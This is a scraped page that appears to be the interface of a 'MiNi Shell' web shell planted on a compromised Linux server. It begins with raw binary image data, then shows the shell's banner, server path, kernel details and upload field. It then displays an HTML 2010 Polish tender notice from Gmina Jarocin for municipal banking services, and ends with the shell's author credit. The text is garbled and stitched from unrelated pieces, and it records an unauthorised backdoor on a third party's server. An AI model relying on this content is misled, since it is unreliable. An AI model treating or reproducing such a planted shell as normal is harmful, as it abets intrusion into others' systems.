JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100820/259742-N-2010.html

<p class="kh_header"><b>Jarocin: Obsługa bankowa budżetu Gminy Jarocin wraz z wszystkimi jednostkami w okresie 
od 01.12.2010 do 29.11.2013 r.</b><br>
<b>Numer ogłoszenia: 259742 - 2010; data zamieszczenia: 20.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jarocin , Al. Niepodległości 10, 63-200 Jarocin, woj. wielkopolskie, tel. 062 7472611, faks 062 7472225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa bankowa budżetu Gminy Jarocin wraz z wszystkimi jednostkami w okresie 
od 01.12.2010 do 29.11.2013 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa obsługa bankowa budżetu Gminy Jarocin wraz z wszystkimi jednostkami w okresie od 01.12.2010 r. do 30.11.2013 r. Wybrany 
w drodze przetargu bank z każdą jednostką podpisze oddzielną umowę. Wykaz jednostek stanowi załącznik nr 5 do SIWZ. W zakres zamówienia wchodzą: 
1. Miesięczna obsługa bankowa polegająca na: 1.1.Otwarciu, prowadzeniu i ewentualnej likwidacji rachunków podstawowych i pomocniczych. 1.2.Przyjmowaniu wpłat gotówkowych własnych, w tym w formie zamkniętej bez sprawdzania zawartości oraz wpłat obcych (obejmuje wpłaty podatków i innych należności dokonywanych przez osoby fizyczne i prawne oraz podmioty nieposiadające osobowości prawnej). 1.3.Dokonywaniu wypłat gotówkowych w złotych i walucie obcej. 1.4.Realizacji poleceń przelewów wewnętrznych (w tym przelewów w ramach jednego konta bankowego) i zewnętrznych. 1.5.Sporządzaniu i dostarczaniu wyciągów bankowych w formie papierowej po każdej zmianie salda w terminie do trzeciego dnia Zamawiającemu i pozostałym jednostkom. 1.6.Wydawaniu czeków.
1.7.Prowadzeniu depozytu. 1.8.Prowadzenie kasety do przechowywania przedmiotów i papierów wartościowych 1.9.Identyfikacji płatności masowych. 1.9.1.Polega na przetworzeniu, identyfikacji i konsolidacji płatności masowych, kierowanych na rachunek bankowy Zamawiającego, do postaci jednego pliku wynikowego o uzgodnionym formacie i zawartości. 1.9.2.Fragment numeru rachunku bankowego z unikatową informacją o płatniku jest ustalany wspólnie z Zamawiającym. 1.9.3.Generowany plik transakcyjny zawierający: - kwotę zbiorczą, będącą sumą kwot przekazanych na rachunek Zamawiającego z różnych źródeł, - podmiotowo zidentyfikowane wszystkie płatności, - księgowanie jedną zbiorczą kwotą płatności na rachunku Zamawiającego,dostarczany będzie łącznie z wyciągiem bankowym do danego rachunku.1.9.4.Plik wynikowy zawiera dane o płatnościach w formacie umożliwiającym automatyczne wczytanie odbiorców do systemu windykacji należności WIP (RADIX). Format pliku uzgodniony będzie wraz z Zamawiającym po zakończeniu procedury przetargowej.1.10.Instalacji oferowanego systemu bankowości elektronicznej oraz bezpłatnym przeszkoleniu osób wyznaczonych przez posiadacza rachunku (Zamawiający i pozostałe jednostki) w zakresie obsługi ww. systemu. 1.10.1.System bankowości elektronicznej zapewnia możliwość wpisywania oraz edycji na wyciągu Bankowym wszystkich informacji przewidzianych w standardowym formacie przelewu bankowego NRB.1.10.2.System musi spełniać wymogi systemu wielostanowiskowego, tj. umożliwiać jednoczesne funkcjonowanie wszystkich terminali w tym samym czasie (on-line). Oznacza to, że w każdym czasie do sieci może być podłączona dowolna ilość terminali, i praca ani operacje żadnego z nich nie blokuje pracy innego.1.10.3.System bankowości elektronicznej musi umożliwiać realizowanie i autoryzowanie co najmniej takich czynności bankowych jak: dokonywanie przelewów (krajowych i zagranicznych) - także z datą przyszłą przelewu umożliwiając jednorazowe wysłanie grupy przelewów w dostosowaniu do okresu rozliczeniowego (np. płatności ZUS, US itp.), tworzenie poleceń zapłaty, przesyłanie danych w formie elektronicznej obejmujących duże zbiory przelewów, z tym że każdy przelew w zbiorze może być edytowany i autoryzowany niezależnie w ramach zbioru.1.10.4.System musi umożliwić sporządzenie raportu ze zbioru 
przelewów zawierającego kwoty zbiorcze obciążające rachunek oraz listę wszystkich przelewów.1.10.5.System bankowości elektronicznej musi zapewnić w czasie bieżącym dostęp do informacji o stanie środków na rachunkach bankowych założonych przez Bank wszystkim jednostkom objętych specyfikacją oraz o przeprowadzonych transakcjach, zgodnie z przyjętymi parametrami dostępu.
1.10.6.Dokładne statusy realizacji wszystkich transakcji widoczne od momentu wprowadzenia do momentu realizacji przez Bank, w czasie bieżącym.1.10.7.System powinien umożliwić dostęp do informacji o transakcjach odrzuconych oraz o transakcjach czekających na podpis, nawet w przypadku, gdy któryś z uprawnionych nie jest zalogowany.1.10.8.Tworzenie raportów z operacji na poszczególnych rachunkach (z możliwością eksportu danych) - zarówno dla grupy rachunków, jak i dla określonego rachunku. Raporty muszą mieć możliwość sortowania, filtrowania i podglądu wybranego typu operacji.1.10.9.Wszelka komunikacja z bankiem poprzez system bankowości elektronicznej musi spełniać wysokie wymogi bezpieczeństwa.
1.10.10.Bank ponosi odpowiedzialność za transakcje nieautoryzowane, z tytułu wejścia do systemu osób nieuprawnionych, za zawinione przez bank.1.11.	Wykonywaniu czynności związanych z konsolidacją sald m.in. w ramach bankowego rachunku skonsolidowanego (o którym mowa w punkcie 2)Ogólne dane o operacjach na rachunkach budżetu Gminy oraz pozostałych jednostek:Łączna liczba rachunków bankowych 62 w tymrachunki do konsolidacji (lokata O/N) 22 rachunki poza konsolidacją 40 w tym rachunki, na których będzie tworzona lokata O/N 3 Rachunki pomocnicze podlegające procesowi identyfikacji płatności masowych do 30 000 Łączna liczba przelewów realizowana rocznie ok. 79 000 w tym przelewy elektroniczne 78 900 wewnętrzne 23 500 zewnętrzne 55 400 przelewy w formie papierowej wewnętrzne) 100 Instalacja systemu bankowości elektronicznej:- ilość stanowisk do obsługi systemu - ilość osób podlegających przeszkoleniu 25 Łączna liczba wpłat gotówkowych własnych rocznie ok. 1 300 Łączna liczba wypłat gotówkowych rocznie ok. 795 w tym w złotych 780 w walucie obcej 15 Łączna ilość wydawanych czeków ok. 800 Łączna kwota wpłat gotówkowych własnych rocznie 2 200 000 PLN Łączna kwota wypłat gotówkowych rocznie 5 200 000 PLN Łączne średnie saldo dzienne na rachunkach podlegających konsolidacji 5 400 000 PLN Łączne średnie saldo dzienne na rachunkach poza konsolidacją, gdzie tworzona będzie lokata O/N 200 000 PLN Łączne średnie saldo dzienne na pozostałych rachunkach bankowych 925 000 PLN - ilość rachunków bankowych może się zwiększyć w ciągu trwania umowy  maksymalnie do 80 - ilości szacunkowe podane w oparciu o przeliczenia w roku 2009 Cena za wymienione usługi ustalona w postaci stałej opłaty miesięcznej (cena w złotych) dla budżetu gminy wraz z wszystkimi jednostkami objętymi przedmiotem zamówienia. Miesięczną opłatę ryczałtową za obsługę bankową będzie ponosił Urząd Miejski w Jarocinie. 2. Lokata OVERNIGHT
Tworzenie lokat OVERNIGHT następować będzie poprzez proces konsolidacji środków w ramach prowadzenia Bankowego rachunku skonsolidowanego Gminy Jarocin przy uwzględnieniu następujących zasad:2.1. Wyodrębniony zostaje rachunek  edykowany (wirtualny) konsolidacji środków.2.2.W każdym dniu roboczym, w godzinie zamknięcia dnia w Banku, dokonywana jest konsolidacja wirtualna wskazanych przez Zamawiającego środków finansowych znajdujących się na rachunkach objętych procesem konsolidacji.2.3. Odsetki z powstałej konsolidacji wirtualnej środków przekazywane są na rachunek Urzędu Miejskiego w Jarocinie. Dla jednostek nie objętych procesem konsolidacji środków w ramach prowadzenia Bankowego rachunku skonsolidowanego Gminy Jarocin (III. Instytucje Kultury wg załącznika nr 5 do SIWZ) tworzenie lokaty OVERNIGHT następować będzie na koniec każdego dnia roboczego na wyodrębnionym wirtualnym rachunku (indywidualnie dla każdej Jednostki) do wysokości salda pozostającego na rachunku bankowym. Oprocentowanie lokaty ustalone według zmiennej stopy procentowej w oparciu o stawkę WIBID O/N skorygowaną o wskaźnik banku stały w całym okresie trwania umowy oraz o stopę rezerwy obowiązkowej, przy czym oprocentowanie tej lokaty nie może być niższe niż oprocentowanie, o którym mowa w punkcie 4.Wysokość stopy WIBID O/N do sporządzenia oferty - stawka z dnia 10.08.2010 r. (3,0900) 3. Kredyt w rachunku bieżącym Możliwość zaciągnięcia kredytu w wysokości 1 000 000 zł na pokrycie występującego w ciągu roku przejściowego deficytu budżetu. Kwota kredytu w rachunku bieżącym w każdym roku objętego zamówieniem może ulegać zmianie i być inna, zależnie od wysokości kwoty kredytu finansującego przejściowy deficyt budżetu wskazanego w uchwale budżetowej Gminy Jarocin na dany rok, jednak w każdym przypadku limit kredytu finansującego ten deficyt w danym roku wykonania zamówienia nie przekroczy kwoty 2 000 000 zł. Spłata ww. kredytu w każdym roku będzie zabezpieczona wekslem własnym in blanco wystawionym przez  Gminę. Oprocentowanie kredytu według zmiennej stopy procentowej w oparciu o stawkę WIBOR 1M plus marża banku niezmienna w całym okresie trwania umowy.Wysokość stopy WIBOR 1M do sporządzenia oferty - stawka z dnia 10.08.2010 r. (3,6000).Od uruchomienia kredytu w rachunku bieżącym nie będzie pobierana prowizja przygotowawcza oraz inne opłaty. 4. Oprocentowanie środków zgromadzonych na rachunkach bankowych Środki zgromadzone na rachunkach bankowych oprocentowane będą według zmiennej stopy procentowej w oparciu o stawkę WIBID 1M skorygowaną wskaźnikiem banku stałym w czasie trwania umowy. Naliczanie odsetek w ostatnim dniu kwartału. Do oferty należy przyjąć WIBID 1M z dnia 10.08.2010 r. (3,4000).Zamawiający nie dopuszcza możliwości pobierania opłat z tytułu wydawania opinii bankowych na wniosek Zamawiającego i obsługiwanych jednostek zmiany karty wzorów podpisów dodatkowych opłat abonamentowych i innych z tytułu obsługi systemu bankowości elektronicznej przyjmowania wpłat gotówkowych na rzecz Urzędu Miejskiego w Jarocinie dotyczących podatków i innych opłat oraz należności dokonywanych przez osoby fizyczne i prawne oraz podmioty nieposiadajace osobowości prawnej dodatkowych opłat za wykonywanie czynności związanych z konsolidacją sald, dodatkowych opłat za czynności związane z identyfikacją płatności masowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać zezwolenie uprawniające do wykonywania czynności bankowych wydane przez Komisję Nadzoru Bankowego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu o zamówienie mogą ubiegać się banki posiadające oddział lub filię na terenie miasta Jarocina</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie - załącznik nr 2 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - wysokość oprocentowania lokaty O/N - 10</li>
<li>3 - wysokość oprocentowania kredytu w rachunku bieżącym - 15</li>
<li>4 - wysokość oprocentowania środków - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jarocin.pl  -BIP<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jarociński Fundusz Poręczeń Kredytowych Sp. z o.o., ul. T. Kościuszki 15B, 63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2010 godzina 09:00, miejsce: Urząd Miejski w Jarocinie - Sekretariat pok. nr 32, Al. Niepodległości 10, 63-200 Jarocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com